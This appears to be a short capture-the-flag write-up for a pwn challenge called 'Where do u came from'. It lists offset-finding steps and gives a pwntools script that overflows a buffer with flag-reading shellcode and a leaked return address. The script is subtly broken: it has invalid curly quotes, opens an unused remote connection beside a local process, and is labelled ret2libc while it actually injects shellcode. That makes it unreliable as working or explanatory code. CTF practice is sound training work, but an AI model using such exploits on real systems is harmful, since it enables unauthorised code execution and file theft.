Trending Tags
Where do u came from
Where do u came from
Category: Pwn
Author: Kirubahari
Challenge Description
Ret2libc attack
Solution
Steps
Finding the right offset using dbg in cyclic mode which gives the correct offset
The return address is given the binary itself.
Combining that both helps in exploiting
Tools Used
gdb
python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#! /usr/bin/python3
from pwn import *
elf = remote(“IP“,port)
io = process()
io.recvuntil(": ")
addr = int(io.recv(14), 16)
shellcode = asm(shellcraft.cat("flag.txt"))
payload = shellcode + cyclic(136 - len(shellcode)) + p64(addr)
io.sendline(payload)
io.interactive()
Flag
1
2
3
FLAG{ret2libc}
Flag
Dynamic Flag